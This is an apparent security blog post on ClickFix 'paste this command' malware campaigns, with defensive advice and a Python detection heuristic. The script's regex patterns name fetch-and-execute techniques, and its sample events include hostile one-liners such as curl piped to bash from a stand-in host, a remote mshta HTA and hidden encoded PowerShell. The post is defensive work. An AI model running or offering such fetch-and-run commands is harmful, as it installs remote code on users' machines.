Brunswick, ME • (207) 245-1010 • contact@johnzblack.com
There’s a malware delivery technique that doesn’t need an exploit, a vulnerability, or a malicious attachment. It just needs the user to follow instructions.
Copy this command. Paste it into Terminal. Press Enter.
That’s the whole attack. It’s called ClickFix, and this week it showed up in three separate campaigns on three different platforms.
Campaign 1: Fake AI tools on macOS. Websites offer what looks like a slick AI productivity tool. The install process asks you to paste a command into Terminal. Mac users do it because it looks like a normal install step. Homebrew alone has trained millions of developers to paste commands from websites. The attackers are exploiting a learned behavior. Once the command runs, it pulls down MacSync, an infostealer that harvests credentials, browser data, and session tokens. No Gatekeeper bypass needed, no code-signing tricks: a payload fetched with curl inside a Terminal session never gets the quarantine attribute that Gatekeeper checks, so Gatekeeper never gets a say. The user was the vulnerability.
Campaign 2: Fake browser updates on Windows. The SmartApeSG campaign runs compromised websites that show a pop-up saying your browser needs an urgent update. Looks convincing. Matches the browser’s visual style. You click, and the page walks you through opening a command prompt or the Run dialog and pasting a script. Payload is Remcos RAT. Full remote access. Keylogging, screen capture, credential theft. It works because it exploits the most common user interaction on the internet: clicking through a notification to make it go away.
Campaign 3: Poisoned VPN downloads. Storm-2561 is running SEO poisoning to put fake VPN download pages at the top of search results. You Google your VPN client, find a page that looks official, download the installer. Except it’s a credential-stealing trojan.
And that last one raises a question IT departments need to answer honestly: why are your users Googling for VPN clients instead of getting them from an internal source?
Three campaigns. Probably not coordinated. Different groups, different payloads, different targets. But they all share the same delivery philosophy: get the user to be the final step in the attack chain. No need to find a bug in the OS. No need to bypass security controls. Just get the user to run a command, click a button, or install something they think is legit.
This is social engineering evolving past email phishing into something more ambient. Phishing impersonates a trusted sender. ClickFix impersonates a trusted interaction pattern. Install this. Update your browser. Paste this command. Things people do every day.
Traditional endpoint defenses struggle here. AV can flag known bad binaries, but the user triggers the initial execution through a legitimate system interface, and the first stage is usually a one-liner that fetches the payload at run time, so there is no file on disk to scan until it is already executing. EDR can see the process chain (an interpreter spawned from the Run dialog or Terminal that immediately reaches out to the internet), but that chain is also exactly what a developer installing Homebrew looks like, so the signal is noisy, and by the time the behavior is unambiguous the trojan’s already running.
What to do about it:
Block clipboard-paste execution in managed environments where you can: on Windows that means removing the Run dialog by policy and putting application control on PowerShell and mshta for users who don’t need them; on macOS it’s harder, because Terminal is where developers live. Manage software distribution centrally so users aren’t Googling for tools. Train specifically against ClickFix, because generic “don’t click suspicious links” training doesn’t cover this: the lure isn’t a link, it’s an instruction. And if you’ve got Mac endpoints, drop the “Macs don’t get viruses” mentality. macOS social engineering delivery is accelerating fast.
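Since the one observable the defender does get is the process chain, here is what a first-pass detection for it looks like in practice. This is an added example written for this post, not code from any EDR vendor or from the campaigns above. The process events are constructed, the hostnames, URLs (on the reserved .invalid domain) and base64 blobs are made up, and the four-field event schema is an assumed simplification of what a Sysmon process-creation event, an EDR feed or macOS Endpoint Security would actually give you. The Homebrew line is the shape of the real install command, included deliberately, because it trips the same heuristic.

```python
"""Heuristic triage for ClickFix-style "paste this command" execution.

Added example for this post, not code from any vendor or from the campaigns
described. The events below are constructed, and the four-field schema
(host, parent image, child image, command line) is an assumed simplification
of what Sysmon event 1, an EDR feed or macOS Endpoint Security would give you.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    host: str
    parent: str   # image name of the parent process
    image: str    # image name of the new process
    cmdline: str  # command line as logged (assumed: the line as pasted)


# Where a "paste this" instruction lands. On Windows the Run dialog (Win+R)
# and cmd are children of explorer.exe; on macOS Terminal/iTerm host a shell.
INTERACTIVE_PARENTS = {"explorer.exe", "cmd.exe", "terminal", "iterm2", "zsh", "bash", "sh"}

# What the pasted line usually starts: an interpreter or a fetch helper.
PASTE_TARGETS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe",
                 "curl", "bash", "sh", "zsh", "osascript"}

# Fetch-and-execute signs inside one command line.
INDICATORS = [
    (re.compile(r"\bcurl\b[^|]*\|\s*(/bin/)?(ba|z)?sh\b"), "curl piped into a shell"),
    (re.compile(r"\$\(\s*curl\b"), "curl output used as a command"),
    (re.compile(r"\s-e(c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I), "encoded PowerShell"),
    (re.compile(r"\b(iex|invoke-expression)\b.*\b(iwr|invoke-webrequest|downloadstring|net\.webclient)\b",
                re.I), "PowerShell download cradle"),
    (re.compile(r"\bmshta(\.exe)?\s+https?://", re.I), "mshta loading a remote HTA"),
    (re.compile(r"\s-w(indowstyle)?\s+hidden\b", re.I), "hidden window"),
    (re.compile(r"\bxattr\s+-\w*d\w*\s+com\.apple\.quarantine\b"), "quarantine attribute stripped"),
]


def triage(ev: ProcEvent) -> list:
    """Reasons an event looks like a pasted fetch-and-run command; empty means clean."""
    chain = ev.parent.lower() in INTERACTIVE_PARENTS and ev.image.lower() in PASTE_TARGETS
    hits = [label for rx, label in INDICATORS if rx.search(ev.cmdline)]
    # Both legs are required. An interpreter under an interactive parent is just
    # a user at a prompt; encoded PowerShell under services.exe is a scheduled
    # admin job. ClickFix lives in the intersection.
    if not (chain and hits):
        return []
    return [f"{ev.image} started from interactive parent {ev.parent}"] + hits


def scan(events) -> dict:
    """host -> reasons, for every event that trips the heuristic."""
    flagged = {}
    for ev in events:
        reasons = triage(ev)
        if reasons:
            flagged[ev.host] = reasons
    return flagged


# Constructed events, one per case discussed in the post. Hostnames, URLs
# (.invalid TLD) and the base64 blobs are made up; the Homebrew line is the
# shape of the real install command.
SAMPLE_EVENTS = [
    ProcEvent("ws-017", "explorer.exe", "powershell.exe",       # fake browser update, Win+R
              "powershell -w hidden -enc SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgA="),
    ProcEvent("ws-022", "explorer.exe", "mshta.exe",            # same campaign style, HTA stage
              "mshta https://update-check.invalid/fix.hta"),
    ProcEvent("mbp-jdoe", "zsh", "sh",                          # fake AI tool, pasted into Terminal
              'sh -c "curl -fsSL https://ai-tool.invalid/setup.sh | bash"'),
    ProcEvent("mbp-asmith", "zsh", "bash",                      # legitimate Homebrew install
              '/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"'),
    ProcEvent("srv-01", "services.exe", "powershell.exe",       # scheduled admin job, not interactive
              "powershell -enc UwB0AG8AcAAtAFMAZQByAHYAaQBjAGUAIABTAHAAbwBvAGwAZQByAA=="),
    ProcEvent("mbp-jdoe", "zsh", "git", "git pull --rebase"),   # ordinary developer activity
]

if __name__ == "__main__":
    for host, reasons in scan(SAMPLE_EVENTS).items():
        print(f"{host}: " + "; ".join(reasons))
```

Two caveats a practitioner should carry over from this. First, the Homebrew host is flagged alongside the three malicious ones, which is the post’s point in code: the heuristic cannot tell a legitimate paste-and-run install from a ClickFix one, so this is a triage queue, not a blocking rule, and it only gets quiet once software is distributed centrally. Second, the schema assumes the collector records the pasted line; a bare `curl ... | bash` typed at an interactive zsh prompt shows up as two separate child processes (curl with the URL, bash with no script) and has to be correlated by parent PID and timing rather than matched in one command line. On Windows there is one more artifact worth knowing: whatever the user pasted into Win+R is also kept in the HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU key, which is a quick forensic check after the fact.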
The uncomfortable truth is that the internet trained users to do exactly what the attackers are asking. Copy. Paste. Execute. We built that behavior into every dev onboarding, every install guide, every Stack Overflow answer. The attackers just borrowed the interaction pattern.